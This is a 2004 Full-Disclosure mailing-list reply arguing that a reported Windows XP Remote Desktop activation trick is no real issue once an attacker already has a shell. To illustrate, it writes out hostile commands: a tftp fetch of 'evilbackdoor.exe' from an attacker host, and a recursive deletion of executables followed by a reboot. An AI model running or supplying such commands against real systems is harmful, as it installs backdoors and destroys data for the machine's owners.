Joel R. Helgeson Director of Networking & Security Services SymetriQ Corporation
"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll be warm for the rest of his life."
----- Original Message ----- From: "morning_wood" <[EMAIL PROTECTED]>
To: "Fixer" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Saturday, October 02, 2004 11:05 AM
Subject: Re: [Full-Disclosure] XP Remote Desktop Remote Activation
a malicious user who has already gained a command shell to activate
umm... you already own the box. try... tftp -i yourhost get evilbackdoor.exe ( vnc mabey )
or
c:\del *.exe /s c:\shutdown -r
I realy do not see the SECURITY ISSUE here.
cheers, m.wood
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
